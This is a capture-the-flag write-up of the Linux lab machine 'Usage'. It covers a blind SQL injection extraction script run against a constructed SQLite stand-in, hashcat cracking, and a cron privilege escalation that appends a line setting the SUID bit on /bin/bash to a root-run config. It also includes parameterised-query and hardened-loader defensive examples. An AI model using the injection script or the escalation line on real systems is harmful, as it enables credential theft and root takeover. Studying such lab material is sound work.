Usage is a medium-difficulty Linux machine that starts with a web application hosting a "Bug Bounty" platform. The initial foothold is a blind SQL injection in a search parameter, which lets us extract the admin user's password hash from the database. After cracking the hash we log in to the admin dashboard and find a file-upload feature affected by a PHP vulnerability (CVE-2023-XXXX, affecting specific image handlers), which gives us a shell. Privilege escalation begins with a hardcoded database password that a system user reuses, followed by abuse of a cron job or binary that runs with elevated privileges.
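The blind SQL injection step from the summary, as an added example that is not part of the original writeup. The application is a constructed stand-in: an in-memory SQLite database with assumed table and column names (users.username, users.password, posts.title) and a placeholder string in place of the real admin hash. The search is boolean-based, so each request only tells us whether the page rendered results, and the script turns that one bit into a binary search over each character's code point. The functions are SQLite dialect (unicode(), substr()); against MySQL you would use ascii(substring(...)). A parameterised version of the same search is included to show why the extraction stops working once the input can only ever be data.

```python
import sqlite3
from typing import Callable

# Constructed stand-in for the vulnerable application. The admin "hash" is a
# placeholder string, not a real bcrypt hash.
ADMIN_HASH = "$2y$10$constructedbcrypthash"


def build_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO posts (title) VALUES ('Bounty program rules'), ('Scope update');
        """
    )
    db.execute("INSERT INTO users (username, password) VALUES ('admin', ?)", (ADMIN_HASH,))
    return db


def search_vulnerable(db: sqlite3.Connection, q: str) -> bool:
    """Boolean oracle: True when the search page would render at least one result.
    The f-string interpolation is the injection point (deliberately vulnerable)."""
    sql = f"SELECT id FROM posts WHERE title LIKE '%{q}%'"
    return db.execute(sql).fetchone() is not None


def search_fixed(db: sqlite3.Connection, q: str) -> bool:
    """Same search with a parameterised query: the input can only ever be data."""
    sql = "SELECT id FROM posts WHERE title LIKE ?"
    return db.execute(sql, (f"%{q}%",)).fetchone() is not None


def extract(oracle: Callable[[str], bool], column: str, where: str, max_len: int = 64) -> str:
    """Recover one column value character by character via binary search on its code point.

    Each oracle call asks "is the code point of character i greater than mid?",
    so seven calls settle one ASCII character. substr() past the end of the value
    yields '' and unicode('') is NULL in SQLite, so every comparison is false, the
    search collapses to 0, and that marks the end of the value.
    """
    recovered = ""
    for i in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # '%' closes the LIKE pattern, '-- ' comments out the trailing %'
            payload = (
                f"%' AND (SELECT unicode(substr({column},{i},1)) FROM users "
                f"WHERE {where}) > {mid} -- "
            )
            if oracle(payload):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        recovered += chr(lo)
    return recovered


def run_demo() -> tuple:
    """Run the extraction against the injectable search and the fixed one."""
    db = build_db()
    vulnerable = extract(lambda q: search_vulnerable(db, q), "password", "username='admin'")
    fixed = extract(lambda q: search_fixed(db, q), "password", "username='admin'")
    return vulnerable, fixed


if __name__ == "__main__":
    got, after_fix = run_demo()
    print("extracted via injection:", got)
    print("extracted after fix:    ", repr(after_fix))
```

Roughly seven requests per character is the cost of a boolean oracle; a real target would also need rate limiting and the response-size or keyword check that distinguishes "results" from "no results" wired into the oracle function.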
We start with an nmap scan to identify open ports and service versions (-sC runs the default scripts, -sV probes versions, -oA writes normal, grepable and XML output under the usage prefix).
nmap -sC -sV -oA usage 10.10.11.18
Results:
We save the extracted admin hash into hash.txt and crack it with hashcat; mode 3200 is bcrypt, which matches the $2y$ prefix of the hash.
hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt
Login:
We log in to the admin dashboard at http://usage.htb/admin with the cracked credentials.
With a shell as dash, obtained through the file-upload vulnerability, we enumerate the system.
Internal services and scheduled tasks: we look for processes and scheduled tasks running as root, and for services bound only to localhost.
ps aux | grep root
Key finding: a binary or script that runs with privileges we do not have (a SUID bit, a root cron job, or a sudo rule).
Scenario A: Cron job / backup script
We inspect /var/spool/cron/crontabs (per-user crontabs, normally readable only by root), /etc/crontab and /etc/cron.d, and compare against the process list. There is a script running as root that processes files in a directory we can write to.
Scenario B: systemctl / service
If sudo -l shows we may restart a service, and we can write to something that service executes, restarting it runs our code as root.
The Exploit:
We find we can write to a configuration file that a root cron job reads. Assuming the job imports or exec()s this .py file (which is what a .py config normally means), the appended line must be valid Python; a bare shell command would be a SyntaxError and the job would abort before reaching it:
echo "import os; os.system('chmod u+s /bin/bash')" >> /opt/scripts/cron_config.py
Wait for the cron to execute.
Once the cron job has run, /bin/bash carries the SUID bit. Launch it with -p so bash keeps the root effective UID (without -p, a SUID bash drops its effective UID back to the real one before running anything):
/bin/bash -p
id
uid=1000(dash) gid=1000(dash) euid=0(root) groups=1000(dash)
The real uid stays dash (1000 is illustrative); what matters is euid=0(root), which is enough to read the flag.
cat /root/root.txt
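The root cause of the privilege escalation above is a root job that executes a file a lower-privileged user can write. The following is an added example, not code from the machine, showing the loader pattern that turns an appended line into root code execution next to the ownership and permission checks that would have refused the tampered file. All paths are temporary files created by the script; BACKUP_DIR and INJECTED are constructed placeholders.

```python
import os
import stat
import tempfile


def load_config_unsafe(path: str) -> dict:
    """Reads the config by executing it. Whoever can append to the file runs
    code as the user of this process (root, when launched from root's crontab)."""
    namespace: dict = {}
    with open(path) as fh:
        exec(fh.read(), namespace)
    return namespace


def config_is_trusted(path: str) -> bool:
    """True only if the file is a regular file (no symlink tricks), owned by the
    user running this process, not writable by group or others, and its parent
    directory is owned by us and not world-writable (otherwise the file can be
    renamed away and replaced)."""
    st = os.lstat(path)
    if not stat.S_ISREG(st.st_mode):
        return False
    me = os.geteuid()
    if st.st_uid != me or st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return False
    parent = os.stat(os.path.dirname(os.path.abspath(path)))
    if parent.st_uid != me or parent.st_mode & stat.S_IWOTH:
        return False
    return True


def load_config(path: str) -> dict:
    """Hardened loader: same behaviour, but only for files nobody else can touch."""
    if not config_is_trusted(path):
        raise PermissionError(f"refusing to execute {path}: not owned by us or writable by others")
    return load_config_unsafe(path)


def demo() -> dict:
    """Constructed scenario: a sane config, then the same file after it was left
    world-writable and a low-privileged user appended a line to it."""
    d = tempfile.mkdtemp()  # mode 0700, owned by us, so the parent-directory check passes
    cfg = os.path.join(d, "cron_config.py")
    with open(cfg, "w") as fh:
        fh.write("BACKUP_DIR = '/var/backups/app'\n")
    os.chmod(cfg, 0o644)
    result = {"clean_trusted": config_is_trusted(cfg)}

    # The misconfiguration: world-writable file, attacker appends a line.
    os.chmod(cfg, 0o666)
    with open(cfg, "a") as fh:
        # Stands in for os.system('chmod u+s /bin/bash'); kept side-effect free here.
        fh.write("INJECTED = 'this line runs as the cron user'\n")
    result["unsafe_executed_injection"] = "INJECTED" in load_config_unsafe(cfg)
    try:
        load_config(cfg)
        result["hardened_rejected"] = False
    except PermissionError:
        result["hardened_rejected"] = True
    return result


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The check is deliberately stricter than "is the file writable by others": a symlink, a group-writable file, or a world-writable parent directory all give the same outcome as the appended line above. The better fix is to not exec() configuration at all and parse a data-only format, but when a .py config is a given, this is the minimum gate a root job should apply.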